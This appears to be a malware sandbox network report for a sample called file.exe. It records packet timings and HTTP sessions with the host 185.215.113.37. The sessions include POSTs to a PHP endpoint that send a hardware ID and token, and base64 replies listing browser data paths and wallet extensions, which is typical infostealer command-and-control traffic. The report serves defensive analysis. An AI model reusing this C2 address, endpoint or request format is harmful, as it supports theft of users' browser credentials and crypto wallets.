Oct 2, 2024 18:19:31.872590065 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.872600079 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.872615099 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:31.872622013 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.872628927 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.872662067 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.978842974 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:31.983681917 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:32.209903955 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:32.209928989 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:32.209943056 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:32.209958076 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:32.209960938 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:32.209976912 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:32.209990978 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:32.210000038 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:32.210059881 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:32.210073948 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:32.210088968 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:32.210098982 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:32.210104942 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:32.210108995 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:32.210131884 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:32.210144997 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:32.210155964 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:32.210169077 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:32.210182905 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:32.210185051 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:32.210202932 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:32.210228920 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:32.210232973 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:32.210266113 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:32.210272074 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:32.210282087 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:32.210319996 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:32.210351944 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:32.210366964 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:32.210390091 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:32.210413933 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:32.210438013 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:32.210453033 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:32.210474968 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:32.210494041 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:32.210515976 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:32.210545063 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:32.210560083 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:32.210573912 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:32.210580111 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:32.210588932 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:32.210602999 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:32.210606098 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:32.210614920 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:32.210634947 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:32.210640907 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:32.210716009 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:32.210731983 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:32.210746050 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:32.210761070 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:32.210767031 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:32.210836887 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:32.210840940 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:32.210855961 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:32.210871935 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:32.210895061 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:32.210908890 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:32.211019993 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:32.211035967 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:32.211051941 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:32.211066961 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:32.211081982 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:32.211092949 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:32.211092949 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:32.211097002 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:32.211106062 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:32.211112976 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:32.211127043 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:32.211158991 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:32.211158991 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:32.211182117 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:32.211261988 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:32.211277008 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:32.211294889 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:32.211308002 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:32.211327076 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:32.211327076 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:32.211393118 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:32.211402893 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:32.211416960 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:32.211432934 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:32.211457968 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:32.211467981 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:32.211473942 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:32.211477041 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:32.211488962 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:32.211503029 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:32.211509943 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:32.211518049 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:32.211529016 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:32.211532116 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:32.211539984 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:32.211546898 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:32.211553097 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:32.211565971 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:32.211585999 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:32.211741924 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:32.211757898 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:32.211771965 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:32.211786985 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:32.211802006 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:32.211811066 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:32.211817980 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:32.211827993 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:32.211846113 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:32.211869001 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:32.212044001 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:32.212059975 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:32.212074995 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:32.212089062 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:32.212102890 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:32.212106943 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:32.212111950 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:32.212117910 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:32.212132931 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:32.212140083 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:32.212146997 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:32.212160110 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:32.212162018 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:32.212176085 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:32.212186098 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:32.212191105 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:32.212205887 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:32.212209940 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:32.212224960 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:32.212250948 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:32.212311029 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:32.212326050 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:32.212340117 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:32.212347984 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:32.212356091 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:32.212362051 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:32.212379932 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:32.212395906 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:32.449009895 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:32.449052095 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:32.453860044 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:32.453875065 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:33.365864038 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:33.365991116 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:33.597313881 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:33.602106094 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:33.831414938 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:33.831435919 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:33.831455946 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:33.831495047 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:33.831521988 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:33.880475998 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:34.182491064 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:34.247878075 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:34.247962952 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:34.475713968 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:34.475781918 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:34.497726917 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:34.502599955 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:35.217060089 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:35.217134953 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:35.241602898 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:35.246438980 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:35.476356983 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:35.476660967 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:35.478038073 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:35.482927084 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:36.205533028 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:36.205857992 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:40.938298941 CEST	49737	80	192.168.2.4	185.215.113.37

HTTP Request Dependency Graph

185.215.113.37

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49737	185.215.113.37	80	7596	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 2, 2024 18:19:16.738249063 CEST	89	OUT	GET / HTTP/1.1 Host: 185.215.113.37 Connection: Keep-Alive Cache-Control: no-cache
Oct 2, 2024 18:19:17.487626076 CEST	203	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 16:19:17 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 2, 2024 18:19:17.489846945 CEST	412	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IEHIIIJDAAAAAAKECBFB Host: 185.215.113.37 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 41 46 34 39 34 36 34 39 36 46 42 34 31 30 39 33 35 33 31 37 31 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 2d 2d 0d 0a Data Ascii: ------IEHIIIJDAAAAAAKECBFBContent-Disposition: form-data; name="hwid"1AF4946496FB4109353171------IEHIIIJDAAAAAAKECBFBContent-Disposition: form-data; name="build"doma------IEHIIIJDAAAAAAKECBFB--
Oct 2, 2024 18:19:17.742175102 CEST	407	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 16:19:17 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 180 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 4d 6a 6b 77 4d 7a 52 6d 59 6a 45 7a 4d 54 68 69 5a 6a 68 68 5a 47 55 79 5a 57 4e 6c 59 7a 46 68 4e 6d 56 6b 4d 44 49 32 4f 44 45 31 4e 7a 42 6a 4f 47 45 77 4f 44 64 6d 59 57 51 31 5a 47 51 79 59 32 45 32 59 7a 56 69 4d 7a 68 6c 4e 57 59 30 4d 47 4a 6a 4d 32 52 6b 4d 57 49 34 4d 54 55 79 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d Data Ascii: MjkwMzRmYjEzMThiZjhhZGUyZWNlYzFhNmVkMDI2ODE1NzBjOGEwODdmYWQ1ZGQyY2E2YzViMzhlNWY0MGJjM2RkMWI4MTUyfHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
Oct 2, 2024 18:19:17.743563890 CEST	469	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FBKEHJEGCFBFHJJKJEHD Host: 185.215.113.37 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 42 4b 45 48 4a 45 47 43 46 42 46 48 4a 4a 4b 4a 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 39 30 33 34 66 62 31 33 31 38 62 66 38 61 64 65 32 65 63 65 63 31 61 36 65 64 30 32 36 38 31 35 37 30 63 38 61 30 38 37 66 61 64 35 64 64 32 63 61 36 63 35 62 33 38 65 35 66 34 30 62 63 33 64 64 31 62 38 31 35 32 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 45 48 4a 45 47 43 46 42 46 48 4a 4a 4b 4a 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 45 48 4a 45 47 43 46 42 46 48 4a 4a 4b 4a 45 48 44 2d 2d 0d 0a Data Ascii: ------FBKEHJEGCFBFHJJKJEHDContent-Disposition: form-data; name="token"29034fb1318bf8ade2ecec1a6ed02681570c8a087fad5dd2ca6c5b38e5f40bc3dd1b8152------FBKEHJEGCFBFHJJKJEHDContent-Disposition: form-data; name="message"browsers------FBKEHJEGCFBFHJJKJEHD--
Oct 2, 2024 18:19:17.978913069 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 16:19:17 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 1520 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 [TRUNCATED] Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3Nl
Oct 2, 2024 18:19:17.978969097 CEST	512	IN	Data Raw: 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 Data Ascii: clxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRml
Oct 2, 2024 18:19:17.980488062 CEST	468	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----ECAEGHIJEHJDHIDHIDAE Host: 185.215.113.37 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 43 41 45 47 48 49 4a 45 48 4a 44 48 49 44 48 49 44 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 39 30 33 34 66 62 31 33 31 38 62 66 38 61 64 65 32 65 63 65 63 31 61 36 65 64 30 32 36 38 31 35 37 30 63 38 61 30 38 37 66 61 64 35 64 64 32 63 61 36 63 35 62 33 38 65 35 66 34 30 62 63 33 64 64 31 62 38 31 35 32 0d 0a 2d 2d 2d 2d 2d 2d 45 43 41 45 47 48 49 4a 45 48 4a 44 48 49 44 48 49 44 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 45 43 41 45 47 48 49 4a 45 48 4a 44 48 49 44 48 49 44 41 45 2d 2d 0d 0a Data Ascii: ------ECAEGHIJEHJDHIDHIDAEContent-Disposition: form-data; name="token"29034fb1318bf8ade2ecec1a6ed02681570c8a087fad5dd2ca6c5b38e5f40bc3dd1b8152------ECAEGHIJEHJDHIDHIDAEContent-Disposition: form-data; name="message"plugins------ECAEGHIJEHJDHIDHIDAE--
Oct 2, 2024 18:19:18.214893103 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 16:19:18 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 7116 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: 